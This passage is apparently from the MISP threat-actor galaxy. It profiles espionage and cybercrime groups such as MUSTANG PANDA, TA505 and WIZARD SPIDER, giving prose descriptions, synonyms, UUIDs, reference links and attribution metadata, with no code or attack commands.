cfr-suspected-victims | ['Afghanistan', 'Armenia', 'Azerbaijan', 'Belarus', 'Belgium', 'Czech Republic', 'Greece', 'India', 'Iran', 'Italy', 'Kazakhstan', 'Kenya', 'Malaysia', 'Russia', 'South Africa', 'Suriname', 'Turkmenistan', 'Ukraine', 'United Kingdom', 'United States', 'Vietnam'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | RU |
HenBox
This threat actor targets Uighurs—a minority ethnic group located primarily in northwestern China—and devices from Chinese mobile phone manufacturer Xiaomi, for espionage purposes.
Internal MISP references
UUID 36ee04f4-a9df-11e8-b92b-d7ddfd3a8896
which can be used as unique global reference for HenBox
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Uighurs'] |
cfr-target-category | ['Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
MUSTANG PANDA
This threat actor targets non-governmental organizations using Mongolian-themed lures for espionage purposes. In April 2017, CrowdStrike Falcon Intelligence observed a previously unattributed actor group with a Chinese nexus targeting a U.S.-based think tank. Further analysis revealed a wider campaign with unique tactics, techniques, and procedures (TTPs). This adversary targets non-governmental organizations (NGOs) in general, but uses Mongolian-language decoys and themes, suggesting a specific focus on gathering intelligence on Mongolia. These campaigns involve the use of shared malware such as Poison Ivy or PlugX. Recently, Falcon Intelligence observed new activity from MUSTANG PANDA, using a unique infection chain to target likely Mongolia-based victims. This newly observed activity uses a series of redirections and fileless, malicious implementations of legitimate tools to gain access to the targeted systems. Additionally, MUSTANG PANDA actors reused previously observed legitimate domains to host files.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MUSTANG PANDA.
Known Synonyms |
---|
BASIN |
BRONZE PRESIDENT |
Earth Preta |
HoneyMyte |
LuminousMoth |
Polaris |
Red Lich |
Stately Taurus |
TA416 |
TANTALUM |
TEMP.HEX |
Twill Typhoon |
Internal MISP references
UUID 78bf726c-a9e6-11e8-9e43-77249a2f7339
which can be used as unique global reference for MUSTANG PANDA
in MISP communities and other software using the MISP galaxy
External references
- https://www.cfr.org/interactive/cyber-operations/mustang-panda - webarchive
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-president - webarchive
- https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european - webarchive
- https://unit42.paloaltonetworks.com/stately-taurus-targets-philippines-government-cyberespionage/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RW1aFyW - webarchive
- https://jsac.jpcert.or.jp/archive/2023/pdf/JSAC2023_2_LT4.pdf - webarchive
- https://thecyberwire.com/podcasts/microsoft-threat-intelligence/4/notes - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'Germany'] |
cfr-target-category | ['Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
Thrip
This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Thrip.
Known Synonyms |
---|
ATK78 |
G0076 |
Internal MISP references
UUID 98be4300-a9ef-11e8-9a95-bb9221083cfc
which can be used as unique global reference for Thrip
in MISP communities and other software using the MISP galaxy
External references
- https://www.cfr.org/interactive/cyber-operations/thrip - webarchive
- https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets - webarchive
- https://attack.mitre.org/groups/G0076/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://cyberthreat.thalesgroup.com/sites/default/files/2022-05/THALES%20THREAT%20HANDBOOK%202022%20Light%20Version_1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['United States'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
Stealth Mango and Tangelo
This threat actor targets organizations in the satellite communications, telecommunications, geospatial-imaging, and defense sectors in the United States and Southeast Asia for espionage purposes.
Internal MISP references
UUID f82b352e-a9f8-11e8-8be8-fbcf6eddd58c
which can be used as unique global reference for Stealth Mango and Tangelo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Pakistan |
cfr-suspected-victims | ['Pakistan', 'Iraq', 'Australia', 'Afghanistan', 'United Arab Emirates', 'Germany', 'India', 'United States'] |
cfr-target-category | ['Government', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | PK |
PowerPool
Malware developers have started to use the zero-day exploit for the Task Scheduler component in Windows, two days after proof-of-concept code for the vulnerability appeared online.
A security researcher who uses the online name SandboxEscaper released, on August 27, the source code for exploiting a security bug in the Advanced Local Procedure Call (ALPC) interface used by the Windows Task Scheduler.
More specifically, the problem is with the SchRpcSetSecurity API function, which fails to properly check the user's permissions, allowing write privileges on files in C:\Windows\Task.
The vulnerability affects Windows versions 7 through 10 and can be used by an attacker to escalate their privileges to the all-access SYSTEM account level.
A couple of days after the exploit code became available (source and binary), malware researchers at ESET noticed its use in active malicious campaigns by a threat actor they call PowerPool, because of its tendency to use tools mostly written in PowerShell for lateral movement.
The group appears to have a small number of victims in the following countries: Chile, Germany, India, the Philippines, Poland, Russia, the United Kingdom, the United States, and Ukraine.
The researchers say that the PowerPool developers did not use the binary version of the exploit, deciding instead to make some subtle changes to the source code before recompiling it.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PowerPool.
Known Synonyms |
---|
IAmTheKing |
Internal MISP references
UUID abd89986-b1b0-11e8-b857-efe290264006
which can be used as unique global reference for PowerPool
in MISP communities and other software using the MISP galaxy
Bahamut
Bahamut is a threat actor primarily operating in the Middle East and Central Asia, suspected to be a private contractor to several state-sponsored actors. It has been observed conducting phishing campaigns as well as desktop and mobile malware campaigns.
Internal MISP references
UUID dc3edacc-bb24-11e8-81fb-8c16458922a7
which can be used as unique global reference for Bahamut
in MISP communities and other software using the MISP galaxy
Iron Group
The Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for the Windows, Linux and Android platforms. They have used their malware to infect at least a few thousand victims.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Iron Group.
Known Synonyms |
---|
Iron Cyber Group |
Internal MISP references
UUID 6a0ea861-229a-45a6-98f5-228f69b43905
which can be used as unique global reference for Iron Group
in MISP communities and other software using the MISP galaxy
Operation BugDrop
This threat actor targets critical infrastructure entities in the oil and gas sector, primarily in Ukraine. The threat actors deploy the BugDrop malware to remotely access the microphones in their targets' computers to eavesdrop on conversations.
Internal MISP references
UUID 75ae52b2-bca3-11e8-af90-a78f33eee6c1
which can be used as unique global reference for Operation BugDrop
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['Ukraine', 'Austria', 'Russia', 'Saudi Arabia'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | RU |
Unnamed Actor
This threat actor compromises civil society groups the Chinese Communist Party views as hostile to its interests, such as Tibetan, Uyghur, Hong Kong, and Taiwanese activists. The threat actor also targeted the Myanmar electoral commission.
Internal MISP references
UUID bea5e256-bcc0-11e8-a478-bbf7e7585a1e
which can be used as unique global reference for Unnamed Actor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['China', 'Myanmar', 'Hong Kong', 'Taiwan'] |
cfr-target-category | ['Civil society', 'Government'] |
cfr-type-of-incident | Espionage |
country | CN |
MageCart
Digital threat management company RiskIQ tracks the activity of the MageCart group and has reported its use of web-based card skimmers since 2016.
Internal MISP references
UUID 0768fd50-c547-11e8-9aa5-776183769eab
which can be used as unique global reference for MageCart
in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/british-airways-fell-victim-to-card-scraping-attack/ - webarchive
- https://www.bleepingcomputer.com/news/security/feedify-hacked-with-magecart-information-stealing-script/ - webarchive
- https://www.bleepingcomputer.com/news/security/magecart-group-compromises-plugin-used-in-thousands-of-stores-makes-rookie-mistake/ - webarchive
- https://www.bleepingcomputer.com/news/security/visiondirect-data-breach-caused-by-magecart-attack/ - webarchive
- https://www.bleepingcomputer.com/news/security/magecart-group-sabotages-rival-to-ruin-data-and-reputation/ - webarchive
Domestic Kitten
An extensive surveillance operation targets specific groups of individuals with malicious mobile apps that collect sensitive information from the device along with recordings of surrounding audio. Researchers at Check Point discovered the attack and named it Domestic Kitten. The targets are Kurdish and Turkish natives and ISIS supporters, all Iranian citizens.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Domestic Kitten.
Known Synonyms |
---|
APT-C-50 |
Bouncing Golf |
Internal MISP references
UUID dda1b28e-c558-11e8-8666-27cf61d1d7ee
which can be used as unique global reference for Domestic Kitten
in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/ - webarchive
- https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html - webarchive
- https://www.welivesecurity.com/2022/10/20/domestic-kitten-campaign-spying-iranian-citizens-furball-malware/ - webarchive
- https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
FASTCash
Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.
Internal MISP references
UUID e38d32a2-c708-11e8-8785-472c4cfccd85
which can be used as unique global reference for FASTCash
in MISP communities and other software using the MISP galaxy
Roaming Mantis
According to new research by Kaspersky's GReAT team, the online criminal activities of the Roaming Mantis Group have continued to evolve since they were first discovered in April 2018. As part of their activities, this group hacks into exploitable routers and changes their DNS configuration. This allows the attackers to redirect the router user's traffic to malicious Android apps disguised as Facebook and Chrome or to Apple phishing pages that were used to steal Apple ID credentials. Recently, Kaspersky has discovered that this group is testing a new monetization scheme by redirecting iOS users to pages that contain the Coinhive in-browser mining script rather than the normal Apple phishing page. When users are redirected to these pages, they will be shown a blank page in the browser, but their CPU utilization will jump to 90% or higher.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Roaming Mantis.
Known Synonyms |
---|
Roaming Mantis Group |
Internal MISP references
UUID b27beb94-ce25-11e8-8e11-2f1a59bd0e91
which can be used as unique global reference for Roaming Mantis
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
threat-actor-classification | ['campaign'] |
GreyEnergy
ESET research reveals a successor to the infamous BlackEnergy APT group targeting critical infrastructure, quite possibly in preparation for damaging attacks
Internal MISP references
UUID d52ca4c4-d214-11e8-8d29-c3e7cb78acce
which can be used as unique global reference for GreyEnergy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
The Shadow Brokers
The Shadow Brokers (TSB) is a hacker group who first appeared in the summer of 2016. They published several leaks containing hacking tools from the National Security Agency (NSA), including several zero-day exploits.[1] Specifically, these exploits and vulnerabilities targeted enterprise firewalls, antivirus software, and Microsoft products. The Shadow Brokers originally attributed the leaks to the Equation Group threat actor, who have been tied to the NSA's Tailored Access Operations unit.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular The Shadow Brokers.
Known Synonyms |
---|
Shadow Brokers |
ShadowBrokers |
TSB |
The ShadowBrokers |
Internal MISP references
UUID d5e90854-d5c9-11e8-98b9-1f98eb80d30a
which can be used as unique global reference for The Shadow Brokers
in MISP communities and other software using the MISP galaxy
External references
- https://en.wikipedia.org/wiki/The_Shadow_Brokers - webarchive
- https://securelist.com/darkpulsar/88199/ - webarchive
- https://musalbas.com/blog/2016/08/16/equation-group-firewall-operations-catalogue.html - webarchive
- https://www.vice.com/en_us/article/53djj3/shadow-brokers-whine-that-nobody-is-buying-their-hacked-nsa-files - webarchive
- https://www.scmagazineuk.com/second-shadow-brokers-dump-released/article/1476023 - webarchive
- https://www.cyberscoop.com/nsa-shadow-brokers-leaks-iran-russia-optimusprime-stoicsurgeon/ - webarchive
- https://www.csoonline.com/article/3190055/new-nsa-leak-may-expose-its-bank-spying-windows-exploits.html - webarchive
- https://threatpost.com/shadowbrokers-dump-more-equation-group-hacks-auction-file-password/124882/ - webarchive
- http://securityaffairs.co/wordpress/62770/hacking/shadowbrokers-return.html - webarchive
- https://www.hackread.com/nsa-data-dump-shadowbrokers-expose-unitedrake-malware/ - webarchive
- https://blacklakesecurity.com/who-was-the-nsa-contractor-arrested-for-leaking-the-shadow-brokers-hacking-tools/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
EvilTraffic
Malware experts at CSE Cybsec uncovered a massive malvertising campaign dubbed EvilTraffic leveraging tens of thousands of compromised websites. Crooks exploited some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenue via advertising.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EvilTraffic.
Known Synonyms |
---|
Operation EvilTraffic |
Internal MISP references
UUID c2d5a052-dc30-11e8-9643-d76f3b9c94fa
which can be used as unique global reference for EvilTraffic
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
HookAds
HookAds is a malvertising campaign that purchases cheap ad space on low-quality ad networks commonly used by adult web sites, online games, or blackhat SEO sites. These ads include JavaScript that redirects a visitor through a series of decoy sites that look like pages filled with native advertisements, online games, or other low-quality pages. Under the right circumstances, a visitor will silently load the Fallout exploit kit, which will try to install its malware payload.
Internal MISP references
UUID dce617eb-a3b6-4a9a-bd76-575c424f9761
which can be used as unique global reference for HookAds
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
INDRIK SPIDER
INDRIK SPIDER is a sophisticated eCrime group that has been operating Dridex since June 2014. In 2015 and 2016, Dridex was one of the most prolific eCrime banking trojans on the market and, since 2014, those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits. Throughout its years of operation, Dridex has received multiple updates with new modules developed and new anti-analysis features added to the malware. In August 2017, a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K.’s National Health Service (NHS), with a high ransom demand of 53 BTC (approximately $200,000 USD). The targeting of an organization rather than individuals, and the high ransom demands, made BitPaymer stand out from other contemporary ransomware at the time. Though the encryption and ransom functionality of BitPaymer was not technically sophisticated, the malware contained multiple anti-analysis features that overlapped with Dridex. Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER, suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy.
Internal MISP references
UUID 658314bc-3bb8-48d2-913a-c528607b75c8
which can be used as unique global reference for INDRIK SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Related clusters
DNSpionage
Cisco Talos recently discovered a new campaign targeting Lebanon and the United Arab Emirates (UAE) affecting .gov domains, as well as a private Lebanese airline company. Based on our research, it's clear that this adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuously as possible during their attacks. Based on this actor's infrastructure and TTPs, we haven't been able to connect them with any other campaign or actor that's been observed recently. This particular campaign utilizes two fake, malicious websites containing job postings that are used to compromise targets via malicious Microsoft Office documents with embedded macros. The malware utilized by this actor, which we are calling "DNSpionage," supports HTTP and DNS communication with the attackers. In a separate campaign, the attackers used the same IP to redirect the DNS of legitimate .gov and private company domains. During each DNS compromise, the actor carefully generated Let's Encrypt certificates for the redirected domains. Let's Encrypt provides X.509 certificates for TLS free of charge to the user. We don't know at this time if the DNS redirections were successful. In this post, we will break down the attackers' methods and show how they used malicious documents to attempt to trick users into opening malicious websites that are disguised as "help wanted" sites for job seekers. Additionally, we will describe the malicious DNS redirection and the timeline of the events.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DNSpionage.
Known Synonyms |
---|
COBALT EDGEWATER |
Internal MISP references
UUID 608a903a-8145-4fd1-84bc-235e278480bf
which can be used as unique global reference for DNSpionage
in MISP communities and other software using the MISP galaxy
External references
- https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html - webarchive
- https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html - webarchive
- https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html - webarchive
- https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/ - webarchive
- https://krebsonsecurity.com/tag/dnspionage/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-edgewater - webarchive
Associated metadata
Metadata key | Value |
---|---|
DarkVishnya
Dubbed DarkVishnya, the attacks targeted at least eight banks using readily available gear such as netbooks or inexpensive laptops, Raspberry Pi mini-computers, or a Bash Bunny, a USB-sized piece of hardware for penetration testing purposes that can pose as a keyboard, flash storage, network adapter, or any serial device.
Internal MISP references
UUID db7fd7dd-28f7-4e8d-a807-8405e4b0f4e2
which can be used as unique global reference for DarkVishnya
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Operation Poison Needles
What’s noteworthy is that according to the introduction on the compromised website of the polyclinic (http://www.p2f.ru), the institution was established in 1965 and was founded by the Presidential Administration of Russia. The multidisciplinary outpatient institution mainly serves the civil servants of the highest executive, legislative, and judicial authorities of the Russian Federation, as well as famous figures of science and art. Since this is the first detection of this APT attack by 360 Security on a global scale, we code-named it “Operation Poison Needles”, considering that the target was a medical institution. Currently, the attribution of the attacker is still under investigation. However, the special background of the polyclinic and the sensitivity of the group it serves both indicate the attack is highly targeted. At the same time, the attack occurred at a very sensitive moment, during the Kerch Strait Incident, so it also raised speculation about the political attribution of the attack.
Internal MISP references
UUID 08ff3cb6-c292-4360-a978-6f05775881ed
which can be used as unique global reference for Operation Poison Needles
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GC01
From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GC01.
Known Synonyms |
---|
Golden Chickens |
Golden Chickens 01 |
Golden Chickens01 |
Internal MISP references
UUID 6bd7c91a-fdf5-11e8-95a8-e712ad4b0a9d
which can be used as unique global reference for GC01
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
GC02
From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GC02.
Known Synonyms |
---|
Golden Chickens |
Golden Chickens 02 |
Golden Chickens02 |
Internal MISP references
UUID 6d50a8a2-fdf5-11e8-9db3-833f231caac8
which can be used as unique global reference for GC02
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
Operation Sharpshooter
The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries. Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.
Internal MISP references
UUID b06c3af1-0243-4428-88da-b3451c345e1e
which can be used as unique global reference for Operation Sharpshooter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
TA505
TA505, the name given by Proofpoint, has been in the cybercrime business for at least four years. This is the group behind the infamous Dridex banking trojan and Locky ransomware, delivered through malicious email campaigns via Necurs botnet. Other malware associated with TA505 include Philadelphia and GlobeImposter ransomware families.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA505.
Known Synonyms |
---|
ATK103 |
CHIMBORAZO |
Dudear |
G0092 |
GOLD TAHOE |
GRACEFUL SPIDER |
Hive0065 |
SectorJ04 |
SectorJ04 Group |
Spandex Tempest |
Internal MISP references
UUID 03c80674-35f8-4fe0-be2b-226ed0fcd69f
which can be used as unique global reference for TA505
in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/ - webarchive
- https://www.proofpoint.com/sites/default/files/ta505_timeline_final4_0.png - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter - webarchive
- https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware - webarchive
- https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf - webarchive
- https://threatpost.com/ta505-servhelper-malware/140792/ - webarchive
- https://blog.yoroi.company/research/the-stealthy-email-stealer-in-the-ta505-arsenal/ - webarchive
- https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/ - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672 - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104 - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-tahoe - webarchive
- https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546 - webarchive
- https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/ - webarchive
- https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic - webarchive
- https://cyberthreat.thalesgroup.com/attackers/ATK103 - webarchive
- https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/ - webarchive
- https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Australia', 'Canada', 'Czech Republic', 'Germany', 'Hungary', 'India', 'Japan', 'Romania', 'Serbia', 'Singapore', 'South Korea', 'Spain', 'Thailand', 'Turkey', 'United Kingdom', 'United States'] |
cfr-target-category | ['Education', 'Finance', 'Health', 'Retail', 'Hospitality'] |
country | RU |
Related clusters
GRIM SPIDER
GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past. Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD. Grim Spider is reportedly associated with Lunar Spider and Wizard Spider.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GRIM SPIDER.
Known Synonyms |
---|
GOLD ULRICK |
Internal MISP references
UUID 3cf6dbb5-bf9e-47d4-a8d5-b6d76f5a791f
which can be used as unique global reference for GRIM SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
WIZARD SPIDER
Wizard Spider is reportedly associated with Grim Spider and Lunar Spider. The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware. This group represents a growing criminal enterprise of which GRIM SPIDER appears to be a subset. The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot (aka IcedID), which was first observed in April 2017. The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud, through the use of webinjects and a malware distribution function. GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WIZARD SPIDER.
Known Synonyms |
---|
DEV-0193 |
DEV-0237 |
FIN12 |
GOLD BLACKBURN |
Periwinkle Tempest |
Pistachio Tempest |
Storm-0193 |
TEMP.MixMaster |
Trickbot LLC |
UNC2053 |
Internal MISP references
UUID bdf4fe4f-af8a-495f-a719-cf175cecda1f
which can be used as unique global reference for WIZARD SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/ - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ - webarchive
- https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/ - webarchive
- https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/ - webarchive
- https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/ - webarchive
- https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware - webarchive
- https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-ulrick - webarchive
- https://www.secureworks.com/research/dyre-banking-trojan - webarchive
- https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic - webarchive
- https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-blackburn - webarchive
- https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf - webarchive
- https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf - webarchive
- https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['Australia', 'Bahamas', 'Canada', 'Costa Rica', 'France', 'Germany', 'India', 'Ireland', 'Italy', 'Japan', 'Mexico', 'New Zealand', 'Spain', 'Switzerland', 'Taiwan', 'United Kingdom', 'Ukraine', 'United States'] |
cfr-target-category | ['Defense', 'Financial', 'Government', 'Healthcare', 'Telecommunications'] |
country | RU |
Related clusters
MUMMY SPIDER
